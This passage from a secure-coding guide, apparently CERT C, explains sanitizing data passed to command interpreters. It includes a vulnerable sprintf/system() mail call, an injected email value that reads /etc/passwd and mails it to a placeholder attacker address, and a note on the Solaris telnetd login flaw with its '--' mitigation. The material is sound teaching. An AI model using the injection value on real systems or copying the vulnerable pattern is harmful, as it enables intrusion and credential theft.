...
| Wiki Markup |
|---|
Data sanitization requires an understanding of the data being passed and the capabilities of the subsystem. John Viega and Matt Messier provide an example of an application that inputs an email address into a buffer and then uses this string as an argument in a call to {{system()}} \[[Viega 03|AA. C References#Viega 03]\]: |
| Code Block | ||
|---|---|---|
| ||
sprintf(buffer, "/bin/mail %s < /tmp/email", addr); system(buffer); |
The risk is, of course, that the user enters the following string as an email e-mail address:
| Code Block |
|---|
bogus@addr.com; cat /etc/passwd | mail some@badguy.net |
...
| Wiki Markup |
|---|
This non-compliant code example is taken from \[[VU#881872|AA. C References#VU881872]\], a vulnerability in the Sun Solaris telnetTELNET daemon ({{in.telnetd}}) that allows a remote attacker to log on to the system with elevated privileges. |
...
Because the login program uses the POSIX getopt() function to parse command-line arguments, and because the "--" (double dash) option causes getopt() to stop interpreting options in the argument list, the USER variable cannot be used by an attacker to inject an additional command-line option. This is a valid means of sanitizing the untrusted user data in this context because the behavior of the interpretation of the resulting string is rendered innocuous.
...